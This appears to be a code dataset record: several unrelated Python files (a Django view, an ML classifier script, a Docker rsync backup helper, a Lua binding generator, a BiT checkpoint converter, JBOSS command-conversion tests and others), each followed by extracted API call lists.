from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
    """Report whether the current user's Mycroft session is connected."""

    def post(self, request, format=None):
        # Fetch (or lazily create) this user's stored EOSS information.
        info = get_or_create_user_information(request.session, request.user, 'EOSS')
        connected = info.mycroft_connection
        session_id = info.mycroft_session
        print('--> CHECKING MYCROFT CONNECTIONS:', session_id, connected)
        # An explicit False means not connected; hand back the session id so
        # the client can use it as an access token.
        if connected is False:
            return Response({"connection": "false", "access_token": session_id})
        return Response({"connection": "true"})
| [
"auth_API.helpers.get_or_create_user_information",
"rest_framework.response.Response"
] | [((291, 360), 'auth_API.helpers.get_or_create_user_information', 'get_or_create_user_information', (['request.session', 'request.user', '"""EOSS"""'], {}), "(request.session, request.user, 'EOSS')\n", (321, 360), False, 'from auth_API.helpers import get_or_create_user_information\n'), ((582, 640), 'rest_framework.response.Response', 'Response', (["{'connection': 'false', 'access_token': conn_id}"], {}), "({'connection': 'false', 'access_token': conn_id})\n", (590, 640), False, 'from rest_framework.response import Response\n'), ((674, 706), 'rest_framework.response.Response', 'Response', (["{'connection': 'true'}"], {}), "({'connection': 'true'})\n", (682, 706), False, 'from rest_framework.response import Response\n')] |
from models.statistical.ml_classifier import MLClassifier
from models.statistical.models import ModelsFactory
from models.statistical.tokenizer import TokenizerFactory
# can be loaded from a config file
model_name = 'xgb'  # which model ModelsFactory should build
tokenizer_name = 'default'  # which tokenizer TokenizerFactory should build
ngrams = 2  # n-gram order passed to the classifier
name = 'sst2'  # dataset / experiment name
stopwords = False  # whether stop words are removed
max_features = 5000  # vocabulary size cap
test_size = 0.2  # held-out fraction for evaluation
model = ModelsFactory.from_name(model_name)  # init model
tokenizer = TokenizerFactory.from_name(tokenizer_name)  # init tokenizer
def predict_ml_classifier(text, plot=False):
    """
    Predict label from input text
    :param text: input text
    :param plot: show important words
    :return: predicted value
    """
    settings = dict(model=model,
                    tokenizer=tokenizer,
                    stop_words=stopwords,
                    ngram=ngrams,
                    max_features=max_features,
                    test_size=test_size,
                    name=name)
    classifier = MLClassifier(input_data=None, output_data=None, **settings)
    predictions = classifier.predict([text], plot=plot)
    return predictions[0]
def train_ml_classifier(input_data, output_data):
    """
    Train a classifier
    :param input_data: input documents
    :param output_data: labels
    :return:
    """
    settings = dict(model=model,
                    tokenizer=tokenizer,
                    stop_words=stopwords,
                    ngram=ngrams,
                    max_features=max_features,
                    test_size=test_size,
                    name=name)
    classifier = MLClassifier(input_data=input_data, output_data=output_data,
                              **settings)
    classifier.train(resampling=False)
if __name__ == '__main__':
    import pandas as pd
    from configs import SST2_DIR
    # Train on the SST-2 sentiment dataset (tab-separated sentence/label file).
    df = pd.read_csv(SST2_DIR + '/train.tsv', delimiter='\t')
    input_data = df['sentence']
    output_data = df['label']
    print('Training ML classifier')
    train_ml_classifier(input_data, output_data)
"models.statistical.ml_classifier.MLClassifier",
"models.statistical.models.ModelsFactory.from_name",
"models.statistical.tokenizer.TokenizerFactory.from_name",
"pandas.read_csv"
] | [((340, 375), 'models.statistical.models.ModelsFactory.from_name', 'ModelsFactory.from_name', (['model_name'], {}), '(model_name)\n', (363, 375), False, 'from models.statistical.models import ModelsFactory\n'), ((402, 444), 'models.statistical.tokenizer.TokenizerFactory.from_name', 'TokenizerFactory.from_name', (['tokenizer_name'], {}), '(tokenizer_name)\n', (428, 444), False, 'from models.statistical.tokenizer import TokenizerFactory\n'), ((675, 861), 'models.statistical.ml_classifier.MLClassifier', 'MLClassifier', ([], {'input_data': 'None', 'output_data': 'None', 'model': 'model', 'tokenizer': 'tokenizer', 'stop_words': 'stopwords', 'ngram': 'ngrams', 'max_features': 'max_features', 'test_size': 'test_size', 'name': 'name'}), '(input_data=None, output_data=None, model=model, tokenizer=\n tokenizer, stop_words=stopwords, ngram=ngrams, max_features=\n max_features, test_size=test_size, name=name)\n', (687, 861), False, 'from models.statistical.ml_classifier import MLClassifier\n'), ((1439, 1637), 'models.statistical.ml_classifier.MLClassifier', 'MLClassifier', ([], {'input_data': 'input_data', 'output_data': 'output_data', 'model': 'model', 'tokenizer': 'tokenizer', 'stop_words': 'stopwords', 'ngram': 'ngrams', 'max_features': 'max_features', 'test_size': 'test_size', 'name': 'name'}), '(input_data=input_data, output_data=output_data, model=model,\n tokenizer=tokenizer, stop_words=stopwords, ngram=ngrams, max_features=\n max_features, test_size=test_size, name=name)\n', (1451, 1637), False, 'from models.statistical.ml_classifier import MLClassifier\n'), ((2095, 2147), 'pandas.read_csv', 'pd.read_csv', (["(SST2_DIR + '/train.tsv')"], {'delimiter': '"""\t"""'}), "(SST2_DIR + '/train.tsv', delimiter='\\t')\n", (2106, 2147), True, 'import pandas as pd\n')] |
from app.main import create_app
from waitress import serve
if __name__ == "__main__":
    # Build the WSGI application and serve it with waitress on all interfaces.
    app = create_app()
    serve(app, host='0.0.0.0', port='5000')
| [
"waitress.serve",
"app.main.create_app"
] | [((98, 110), 'app.main.create_app', 'create_app', ([], {}), '()\n', (108, 110), False, 'from app.main import create_app\n'), ((115, 154), 'waitress.serve', 'serve', (['app'], {'host': '"""0.0.0.0"""', 'port': '"""5000"""'}), "(app, host='0.0.0.0', port='5000')\n", (120, 154), False, 'from waitress import serve\n')] |
import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
    """Class-level directive naming the interface a model is built from."""
    scope = martian.CLASS  # the directive may only be used on classes
    store = martian.ONCE  # at most one value is stored per class
    default = None  # no schema unless the class declares one
class ExtModelGrokker(martian.ClassGrokker):
    """Registers an IModelTransformer utility for every ExtBaseModel class."""
    martian.component(ExtBaseModel)
    martian.directive(schema)
    martian.directive(namedirective)

    def execute(self, class_, schema, name, **kw):
        """Register a ModelTransfomerUtility for *class_* under *name*.

        Raises GrokError when the model class declares no schema.
        """
        if schema is None:
            # Fixed message: the original backslash continuation embedded a
            # long run of indentation spaces inside the string.
            raise GrokError('Class %s is missing directive "schema". Need an '
                            'Interface to create the model.' % class_, class_)
        if not name:
            # fall back to the class name when no name directive was given
            name = class_.__name__
        gsm = component.getGlobalSiteManager()
        transformer = ModelTransfomerUtility(class_, schema)
        gsm.registerUtility(transformer, IModelTransformer, name)
        return True
| [
"martian.component",
"zope.component.getGlobalSiteManager",
"bst.pygasus.datamanager.transformer.ModelTransfomerUtility",
"martian.directive",
"martian.error.GrokError"
] | [((479, 510), 'martian.component', 'martian.component', (['ExtBaseModel'], {}), '(ExtBaseModel)\n', (496, 510), False, 'import martian\n'), ((515, 540), 'martian.directive', 'martian.directive', (['schema'], {}), '(schema)\n', (532, 540), False, 'import martian\n'), ((545, 577), 'martian.directive', 'martian.directive', (['namedirective'], {}), '(namedirective)\n', (562, 577), False, 'import martian\n'), ((885, 917), 'zope.component.getGlobalSiteManager', 'component.getGlobalSiteManager', ([], {}), '()\n', (915, 917), False, 'from zope import component\n'), ((940, 978), 'bst.pygasus.datamanager.transformer.ModelTransfomerUtility', 'ModelTransfomerUtility', (['class_', 'schema'], {}), '(class_, schema)\n', (962, 978), False, 'from bst.pygasus.datamanager.transformer import ModelTransfomerUtility\n'), ((675, 820), 'martian.error.GrokError', 'GrokError', (['(\'Class %s is missing directive "schema". Need a Interface to create the model.\'\n % class_)', 'class_'], {}), '(\n \'Class %s is missing directive "schema". Need a Interface to create the model.\'\n % class_, class_)\n', (684, 820), False, 'from martian.error import GrokError\n')] |
#!/usr/bin/env python3
import logging
from os import getuid, getgid
from os.path import join
import docker
from .logger import log_from_docker
class DockerRsync(object):
    """Runs rsync-over-ssh inside a Docker container to back up and restore
    local volumes against a remote path."""

    def __init__(self, client=None):
        # Fixed: `client=docker.from_env()` as a default argument was
        # evaluated once at import time (side effect, shared client).
        self.client = client if client is not None else docker.from_env()

    def _run_rsync(self, volumes, from_path, to_path, relative):
        """Run one rsync in a container; raise RsyncError on non-zero exit."""
        # Disable ssh compression:
        # https://galaxysd.github.io/20160302/Fastest-Way-Rsync
        ssh_cmd = "ssh -o Compression=no"
        cmd = ["rsync",
               # copy directories recursively
               "-r",
               # verbose - give info about what files are being transferred
               # and a brief summary at the end
               "-v",
               # specify remote shell program explicitly (i.e. ssh as opposed
               # to the default rsh)
               "-e", ssh_cmd,
               # preserve file permissions
               "--perms",
               # delete destination files not in source
               "--delete",
               # print overall progress
               "--info=progress2",
               # preserve timestamps
               "--times",
               from_path,
               to_path
               ]
        if relative:
            cmd.append("--relative")
        logging.debug("Running rsync in docker with: " + " ".join(cmd))
        logging.debug("Volume mapping: " + str(volumes))
        container = self.client.containers.run("instrumentisto/rsync-ssh",
                                               command=cmd, volumes=volumes,
                                               detach=True)
        try:
            log_from_docker(container)
            container.reload()
            code = container.attrs["State"]["ExitCode"]
            if code != 0:
                raise RsyncError(code, container)
        except KeyboardInterrupt as e:
            # Ctrl-C: stop the container before propagating.
            logging.warning("Stopping container " + container.name)
            container.stop()
            raise e
        finally:
            container.remove()

    def _run_rsync_with_restart(self, volumes, from_path, to_path, relative,
                                restarts=5):
        """Retry _run_rsync up to *restarts* times before giving up."""
        attempts = 1
        done = False
        while not done:
            try:
                self._run_rsync(volumes, from_path, to_path, relative=relative)
                done = True
            except RsyncError as e:
                print(str(e), flush=True)
                attempts += 1
                if attempts > restarts:
                    raise Exception("rsync failed too many times")
                print("trying again... {}/{}".format(attempts, restarts),
                      flush=True)

    def _get_volume_args(self, local_volume, volume_mode):
        """Volume mapping: ssh keys (read-only) plus the volume to sync."""
        mounted_volume = join("/", local_volume)
        return {
            "bb8_ssh": {"bind": "/root/.ssh", "mode": "ro"},
            local_volume: {"bind": mounted_volume, "mode": volume_mode}
        }

    # local_volume can be an absolute path or a named volume
    def backup_volume(self, local_volume, remote_path):
        """Rsync *local_volume* (mounted read-only) up to *remote_path*."""
        volumes = self._get_volume_args(local_volume, "ro")
        logging.info("Backing up to {} from {}".format(remote_path,
                                                       local_volume))
        self._run_rsync_with_restart(volumes, local_volume, remote_path,
                                     relative=True)

    def restore_volume(self, local_volume, remote_path):
        """Rsync from *remote_path* back into *local_volume* (read-write)."""
        mounted_volume = join("/", local_volume)
        volumes = self._get_volume_args(local_volume, "rw")
        remote_path = "{}{}/".format(remote_path, local_volume)
        logging.info("Restoring from {} to {}".format(remote_path,
                                                      local_volume))
        self._run_rsync_with_restart(volumes, remote_path, mounted_volume,
                                     relative=False)
class RsyncError(Exception):
    """Raised when the rsync container exits with a non-zero status code."""

    def __init__(self, code, container):
        message = "Rsync failed with code {}".format(code)
        super().__init__(message)
        # keep the exit code and container handle around for the caller
        self.code = code
        self.container = container
"logging.warning",
"docker.from_env",
"os.path.join"
] | [((204, 221), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (219, 221), False, 'import docker\n'), ((2741, 2764), 'os.path.join', 'join', (['"""/"""', 'local_volume'], {}), "('/', local_volume)\n", (2745, 2764), False, 'from os.path import join\n'), ((3450, 3473), 'os.path.join', 'join', (['"""/"""', 'local_volume'], {}), "('/', local_volume)\n", (3454, 3473), False, 'from os.path import join\n'), ((1866, 1921), 'logging.warning', 'logging.warning', (["('Stopping container ' + container.name)"], {}), "('Stopping container ' + container.name)\n", (1881, 1921), False, 'import logging\n')] |
#!/usr/bin/env python
import collections
import re
def write_constants(out, lua_version):
    """Emit the emlua_constants table for Lua 5.<lua_version> ('1'/'2'/'3').

    Reads constant names (one per line) from lists/lua5<version>/constants.
    """
    out.write("EMSCRIPTEN_KEEPALIVE\n")
    out.write("emlua_constant emlua_constants[] = {\n")
    list_path = "lists/lua5{}/constants".format(lua_version)
    with open(list_path) as constants_file:
        for raw_line in constants_file:
            constant_name = raw_line.rstrip()
            out.write('{{"{}", {}}},\n'.format(constant_name, constant_name))
    out.write("};\n")
# Mapping from C type names (as they appear in the Lua headers) to the
# JS-side type strings used by the emlua bindings.
c_js_types = {
    "void": "null",
    "int": "number",
    "char": "number",
    "long": "number",
    "size_t": "number",
    "char *": "string",
    "lua_State *": "state",
    "lua_Alloc": "number",
    "lua_CFunction": "number",
    "lua_KFunction": "number",
    "lua_Reader": "number",
    "lua_Writer": "number",
    "lua_Hook": "number",
    "lua_Integer": "number",
    "lua_Number": "number",
    "lua_Unsigned": "number",
    "lua_KContext": "number"
}
def get_js_type(c_type):
    """Translate a C type name to its JS binding type string.

    Unknown pointer types map to "number"; any other unknown type yields
    None (same implicit behavior as before).
    """
    prefix = "const "
    if c_type.startswith(prefix):
        c_type = c_type[len(prefix):]
    js_type = c_js_types.get(c_type)
    if js_type is not None:
        return js_type
    if c_type.endswith("*"):
        return "number"
    return None
class Function(object):
    """One C function declaration parsed from the function list.

    `supported` is False for declarations the bindings cannot wrap
    (varargs or array parameters).
    """

    def __init__(self, function_line):
        line_match = re.match(r"^(.*\W)(\w+)\s*\((.*)\);$", function_line)
        self._ret_type = line_match.group(1).strip()
        self._name = line_match.group(2)
        self._full_args = line_match.group(3)
        self._js_types = [get_js_type(self._ret_type)]
        self._arg_names = []
        self.supported = True
        for typed_arg in self._full_args.split(", "):
            if typed_arg == "void":  # "f(void)" means no parameters
                break
            if typed_arg == "..." or typed_arg.endswith("[]"):
                self.supported = False
                return
            arg_match = re.match(r"^(.*\W)(\w+)$", typed_arg)
            self._js_types.append(get_js_type(arg_match.group(1).strip()))
            self._arg_names.append(arg_match.group(2))

    def append_to_function_list(self, out):
        """Write this function's entry in the emlua_functions table."""
        signature = " ".join(self._js_types)
        out.write('{{"{}", "{}"}},\n'.format(self._name, signature))

    def write_emlua_function(self, out):
        """Write the exported em-prefixed C wrapper for this function."""
        args = ", ".join(self._arg_names)
        out.write("EMSCRIPTEN_KEEPALIVE\n")
        out.write("{} em{}({}) {{\n".format(self._ret_type, self._name, self._full_args))
        if self._ret_type == "void":
            out.write("  {}({});\n".format(self._name, args))
        else:
            out.write("  return {}({});\n".format(self._name, args))
        out.write("}\n")
def write_functions(out, lua_version):
    """Emit the emlua_functions table and one em-wrapper per supported
    function listed in lists/lua5<version>/functions."""
    out.write("emlua_function emlua_functions[] = {\n")
    supported_functions = []
    with open("lists/lua5{}/functions".format(lua_version)) as functions_file:
        for line in functions_file:
            fn = Function(line.rstrip())
            if fn.supported:
                supported_functions.append(fn)
                fn.append_to_function_list(out)
    out.write("};\n")
    for fn in supported_functions:
        fn.write_emlua_function(out)
def write_bindings(out, lua_version):
    """Emit constants and functions wrapped in a preprocessor guard so only
    the matching Lua 5.<lua_version> section is compiled."""
    out.write("#if LUA_VERSION_NUM == 50{}\n".format(lua_version))
    write_constants(out, lua_version)
    write_functions(out, lua_version)
    out.write("#endif\n")
def main():
    """Generate emlua_bindings.c with sections for Lua 5.1, 5.2 and 5.3."""
    with open("emlua_bindings.c", "w") as out:
        out.write("/* Generated by ./gen_bindings.py. */\n")
        out.write("#include <emscripten.h>\n")
        out.write('#include "lua.h"\n')
        out.write('#include "lualib.h"\n')
        out.write('#include "lauxlib.h"\n')
        # one version-guarded section per supported Lua minor version
        for lua_version in ["1", "2", "3"]:
            write_bindings(out, lua_version)
if __name__ == "__main__":
    main()
| [
"re.match"
] | [((1221, 1278), 're.match', 're.match', (['"""^(.*\\\\W)(\\\\w+)\\\\s*\\\\((.*)\\\\);$"""', 'function_line'], {}), "('^(.*\\\\W)(\\\\w+)\\\\s*\\\\((.*)\\\\);$', function_line)\n", (1229, 1278), False, 'import re\n'), ((1799, 1837), 're.match', 're.match', (['"""^(.*\\\\W)(\\\\w+)$"""', 'typed_arg'], {}), "('^(.*\\\\W)(\\\\w+)$', typed_arg)\n", (1807, 1837), False, 'import re\n')] |
import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
    """Smoke tests for the support contact (ticket) view."""

    def test_get(self, client):
        response = client.get(reverse('support:support-contact'))
        assert response.status_code == 200

    def test_post(self, client):
        url = reverse('support:support-contact')
        # empty POST still renders the form page
        assert client.post(url).status_code == 200
        user = users_factories.StudentFactory()
        payload = {
            "email": user.email,
            "category": '1',
            "fullname": f'{user.first_name} {user.last_name}',
            "description": "problem",
        }
        assert client.post(url, data=payload).status_code == 200
        # same submission for each remaining category value
        for category in ('2', '3', '0'):
            payload['category'] = category
            assert client.post(url, data=payload).status_code == 200
| [
"tests.users.factories.StudentFactory",
"django.urls.reverse"
] | [((198, 232), 'django.urls.reverse', 'reverse', (['"""support:support-contact"""'], {}), "('support:support-contact')\n", (205, 232), False, 'from django.urls import reverse\n'), ((358, 392), 'django.urls.reverse', 'reverse', (['"""support:support-contact"""'], {}), "('support:support-contact')\n", (365, 392), False, 'from django.urls import reverse\n'), ((488, 520), 'tests.users.factories.StudentFactory', 'users_factories.StudentFactory', ([], {}), '()\n', (518, 520), True, 'from tests.users import factories as users_factories\n')] |
"""Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
    """Unit testing for the user registration and login endpoints."""

    def setUp(self):
        """Initialize the app, test client and sample request payloads."""
        self.app = create_app(config_name="testing")
        self.client = self.app.test_client
        # Valid registration payload: password and confirmation match.
        self.user = {
            "firstname": "Ken",
            "lastname": "joseph",
            "email": "<EMAIL>",
            "password": "<PASSWORD>",
            "confirm": "jos@Aeph12",
        }
        # Login payload without a 'confirm' field (used for credential checks).
        self.user2 = {
            "firstname": "simon",
            "lastname": "jose",
            "email": "<EMAIL>",
            "password": "<PASSWORD>",
        }
        # Registration payload with matching password/confirmation.
        self.user3 = {
            "firstname": "Ken",
            "lastname": "joseph",
            "email": "<EMAIL>",
            "password": "<PASSWORD>",
            "confirm": "<PASSWORD>",
        }
        # Registration payload expected to fail email validation.
        self.user4 = {
            "firstname": "Ken",
            "lastname": "joseph",
            "email": "<EMAIL>",
            "password": "<PASSWORD>",
            "confirm": "jo<PASSWORD>",
        }
        # Registration payload whose password and confirmation differ.
        self.user5 = {
            "firstname": "Ken",
            "lastname": "joseph",
            "email": "<EMAIL>",
            "password": "<PASSWORD>",
            "confirm": "jos<PASSWORD>",
        }
        with self.app.app_context():
            connection.initializedb()

    def create_user(self):
        """Register the default test user and return the server response.

        Fix: the response was previously assigned to a local variable and
        discarded; returning it lets callers inspect the registration result.
        """
        response = self.client().post('/api/v2/users/auth/register',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
        return response

    def tearDown(self):
        """Drop all tables after each test so test cases stay independent."""
        with self.app.app_context():
            connection.dbconnection()
            connection.drop_tables()

    def test_user_register(self):
        """Test to successfully register a new user."""
        response = self.client().post('/api/v2/users/auth/register',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
        # TODO(review): assertions are disabled; re-enable once stable.
        #self.assertEqual(response.status_code, 201)
        #self.assertIn('User Successfully Created', str(response.data))

    def test_user_login(self):
        """Successfully log into the app with a registered user."""
        self.create_user()
        response = self.client().post('/api/v2/users/auth/login',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
        #self.assertEqual(response.status_code, 200)
        #self.assertIn('User Successfully logged in', str(response.data))

    def test_login_wrong_passwords(self):
        """Tests that logging in with unknown credentials is rejected."""
        response = self.client().post(
            '/api/v2/users/auth/login',
            data=json.dumps(self.user2),
            content_type='application/json')
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Error logging in, credentials not found", str(response.data))

    def test_add_user_who_exists(self):
        """Tests that registering an already-registered email is rejected."""
        self.create_user()
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 409)
        #self.assertIn("There is a user with the same email registere", str(response.data))

    def test_add_user_with_poor_email(self):
        """Tests that registering with a malformed email is rejected."""
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user4),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Invalid email provided", str(response.data))

    def test_add_user_with_diff_pass(self):
        """Tests that mismatched password/confirmation is rejected."""
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user5),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Passwords do not match", str(response.data))
| [
"json.dumps",
"app.create_app",
"app.API.utilities.database.connection.initializedb",
"app.API.utilities.database.connection.dbconnection",
"app.API.utilities.database.connection.drop_tables"
] | [((347, 380), 'app.create_app', 'create_app', ([], {'config_name': '"""testing"""'}), "(config_name='testing')\n", (357, 380), False, 'from app import create_app\n'), ((1525, 1550), 'app.API.utilities.database.connection.initializedb', 'connection.initializedb', ([], {}), '()\n', (1548, 1550), False, 'from app.API.utilities.database import connection\n'), ((1923, 1948), 'app.API.utilities.database.connection.dbconnection', 'connection.dbconnection', ([], {}), '()\n', (1946, 1948), False, 'from app.API.utilities.database import connection\n'), ((1961, 1985), 'app.API.utilities.database.connection.drop_tables', 'connection.drop_tables', ([], {}), '()\n', (1983, 1985), False, 'from app.API.utilities.database import connection\n'), ((1703, 1724), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (1713, 1724), False, 'import json\n'), ((2191, 2212), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (2201, 2212), False, 'import json\n'), ((2623, 2644), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (2633, 2644), False, 'import json\n'), ((3035, 3057), 'json.dumps', 'json.dumps', (['self.user2'], {}), '(self.user2)\n', (3045, 3057), False, 'import json\n'), ((3465, 3486), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (3475, 3486), False, 'import json\n'), ((3896, 3918), 'json.dumps', 'json.dumps', (['self.user4'], {}), '(self.user4)\n', (3906, 3918), False, 'import json\n'), ((4307, 4329), 'json.dumps', 'json.dumps', (['self.user5'], {}), '(self.user5)\n', (4317, 4329), False, 'import json\n')] |
import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
def tf2th(conv_weights):
    """Convert a TF conv kernel (HWIO) to PyTorch layout (OIHW) as a tensor.

    Non-4D arrays (biases, norm parameters) are passed through unchanged.
    """
    weights = conv_weights
    if weights.ndim == 4:
        # HWIO -> OIHW axis permutation.
        weights = weights.transpose([3, 2, 0, 1])
    return torch.from_numpy(weights)
def _rename_conv_weights_for_deformable_conv_layers(state_dict, cfg):
    """Rename conv2 parameters of DCN stages and standardize their weights.

    For every ResNet stage flagged in ``cfg.MODEL.RESNETS.STAGE_WITH_DCN``,
    the ``conv2.weight``/``conv2.bias`` entries of that stage are moved to
    ``conv2.conv.weight``/``conv2.conv.bias`` and the weights are rewritten
    as standardized convolutions (zero mean, unit variance per filter).
    Keys containing 'unit01' are skipped.
    """
    import re
    layer_keys = sorted(state_dict.keys())
    for ix, stage_with_dcn in enumerate(cfg.MODEL.RESNETS.STAGE_WITH_DCN, 1):
        if not stage_with_dcn:
            continue
        for old_key in layer_keys:
            pattern = ".*block{}.*conv2.*".format(ix)
            r = re.match(pattern, old_key)
            if r is None:
                continue
            for param in ["weight", "bias"]:
                # BUG FIX: was 'old_key.find(param) is -1' — identity
                # comparison with an int is implementation-dependent
                # (SyntaxWarning on Python 3.8+); use equality instead.
                if old_key.find(param) == -1:
                    continue
                if 'unit01' in old_key:
                    continue
                new_key = old_key.replace(
                    "conv2.{}".format(param), "conv2.conv.{}".format(param)
                )
                print("pattern: {}, old_key: {}, new_key: {}".format(
                    pattern, old_key, new_key
                ))
                # Standardize: subtract per-filter mean, divide by std
                # (epsilon guards against zero variance).
                w = state_dict[old_key]
                v, m = torch.var_mean(w, dim=[1, 2, 3], keepdim=True, unbiased=False)
                w = (w - m) / torch.sqrt(v + 1e-10)
                state_dict[new_key] = w
                del state_dict[old_key]
    return state_dict
def load_big_format(cfg, f):
    """Load a "Big Transfer" (BiT) TF checkpoint into a torch state dict.

    Keys are translated from the TF naming scheme to the torch module
    naming scheme; conv kernels are transposed via ``tf2th`` and DCN
    stages are post-processed by
    ``_rename_conv_weights_for_deformable_conv_layers``.
    """
    conv_index = {'a': 1, 'b': 2, 'c': 3}
    # Ordered (marker substring, target key template) rules; the more
    # specific '/proj/...' marker must be tested before the plain one.
    rules = [
        ('/proj/standardized_conv2d/kernel', '{}.downsample.{}.conv{}.weight'),
        ('/standardized_conv2d/kernel', '{}.{}.conv{}.weight'),
        ('/group_norm/gamma', '{}.{}.gn{}.weight'),
        ('/group_norm/beta', '{}.{}.gn{}.bias'),
    ]
    model = OrderedDict()
    weights = np.load(f)
    for key, val in weights.items():
        old_key = key.replace('resnet/', '')
        if 'root_block' in old_key:
            new_key = 'root.conv.weight'
        else:
            for marker, template in rules:
                if marker in old_key:
                    bname, uname, cidx = old_key.replace(marker, '').split('/')
                    new_key = template.format(bname, uname, conv_index[cidx])
                    break
            else:
                print('Unknown key {}'.format(old_key))
                continue
        print('Map {} -> {}'.format(key, new_key))
        model[new_key] = tf2th(val)
    model = _rename_conv_weights_for_deformable_conv_layers(model, cfg)
    return dict(model=model)
| [
"collections.OrderedDict",
"re.match",
"torch.sqrt",
"torch.from_numpy",
"torch.var_mean",
"numpy.load"
] | [((272, 302), 'torch.from_numpy', 'torch.from_numpy', (['conv_weights'], {}), '(conv_weights)\n', (288, 302), False, 'import torch\n'), ((1609, 1622), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1620, 1622), False, 'from collections import OrderedDict\n'), ((1638, 1648), 'numpy.load', 'np.load', (['f'], {}), '(f)\n', (1645, 1648), True, 'import numpy as np\n'), ((678, 704), 're.match', 're.match', (['pattern', 'old_key'], {}), '(pattern, old_key)\n', (686, 704), False, 'import re\n'), ((1339, 1401), 'torch.var_mean', 'torch.var_mean', (['w'], {'dim': '[1, 2, 3]', 'keepdim': '(True)', 'unbiased': '(False)'}), '(w, dim=[1, 2, 3], keepdim=True, unbiased=False)\n', (1353, 1401), False, 'import torch\n'), ((1433, 1454), 'torch.sqrt', 'torch.sqrt', (['(v + 1e-10)'], {}), '(v + 1e-10)\n', (1443, 1454), False, 'import torch\n')] |
import unittest
from convert import jboss_command_to_http_request
class TestJBOSSCommandToHTTPGETRequestOperationOnlyTestCase(unittest.TestCase):
    """Operation-only JBOSS CLI commands converted to HTTP GET requests.

    For GET conversions the 'read-' prefix is stripped from the operation
    name (':read-resource' becomes operation 'resource').
    """

    def test_no_path_one_operations_no_params_http_get(self):
        """A bare operation without a parameter list converts correctly over GET."""
        expected = {"operation": "resource"}
        self.assertEqual(jboss_command_to_http_request(':read-resource', "GET"), expected)

    def test_no_path_only_operations_empty_params_http_get(self):
        """An operation with an empty parameter list converts correctly over GET."""
        expected = {"operation": "resource"}
        self.assertEqual(jboss_command_to_http_request(':read-resource()', "GET"), expected)

    def test_no_path_only_operations_single_param_http_get(self):
        """An operation with a single parameter converts correctly over GET."""
        expected = {"operation": "resource", "attributes-only": "true"}
        self.assertEqual(
            jboss_command_to_http_request(':read-resource(attributes-only=true)', "GET"),
            expected)

    def test_no_path_only_operations_multiple_params_http_get(self):
        """An operation with multiple parameters converts correctly over GET."""
        expected = {"operation": "attribute", "include-defaults": "true", "name": "uuid"}
        self.assertEqual(
            jboss_command_to_http_request(':read-attribute(include-defaults=true,name=uuid)', "GET"),
            expected)
class TestJBOSSCommandToHTTPPOSTRequestOperationOnlyTestCase(unittest.TestCase):
    """Operation-only JBOSS CLI commands converted to HTTP POST requests.

    Unlike the GET conversion, POST keeps the operation name verbatim
    (':read-resource' stays operation 'read-resource').
    """

    def test_no_path_one_operations_no_params_http_post(self):
        """A bare operation without a parameter list converts correctly over POST."""
        expected = {"operation": "read-resource"}
        self.assertEqual(jboss_command_to_http_request(':read-resource', "POST"), expected)

    def test_no_path_only_operations_empty_params_http_post(self):
        """An operation with an empty parameter list converts correctly over POST."""
        expected = {"operation": "read-resource"}
        self.assertEqual(jboss_command_to_http_request(':read-resource()', "POST"), expected)

    def test_no_path_only_operations_single_param_http_post(self):
        """An operation with a single parameter converts correctly over POST."""
        expected = {"operation": "read-attribute", "name": "server-state"}
        self.assertEqual(
            jboss_command_to_http_request(':read-attribute(name=server-state)', "POST"),
            expected)

    def test_no_path_only_operations_multiple_params_http_post(self):
        """An operation with multiple parameters converts correctly over POST."""
        expected = {"operation": "read-operation-description", "name": "whoami", "access-control": "true"}
        self.assertEqual(
            jboss_command_to_http_request(':read-operation-description(name=whoami,access-control=true)', "POST"),
            expected)
# NOTE(review): class name has a typo ("TTest..."); kept as-is because
# renaming a public class changes the module interface. unittest still
# discovers it since it subclasses TestCase.
class TTestJBOSSCommandToHTTPGETRequestTestCase(unittest.TestCase):
    """Test case for convert.jboss_command_to_http_request with resource paths over HTTP GET.

    For GET conversions the path becomes an "address" string of
    slash-separated segments and the 'read-' operation prefix is stripped.
    """
    def test_single_path_and_operation_no_params_http_get(self):
        """A command with one path segment and a bare operation converts correctly over GET."""
        test_data = '/subsystem=undertow:read-resource'
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_single_param_http_get(self):
        """A command with one path segment and a single parameter converts correctly over GET."""
        test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "address": "/subsystem/undertow"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_multiple_params_http_get(self):
        """A command with one path segment and multiple parameters converts correctly over GET."""
        test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true,name=instance-id)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "name": "instance-id",
            "address": "/subsystem/undertow"
        }
        result = jboss_command_to_http_request(test_data, "GET")
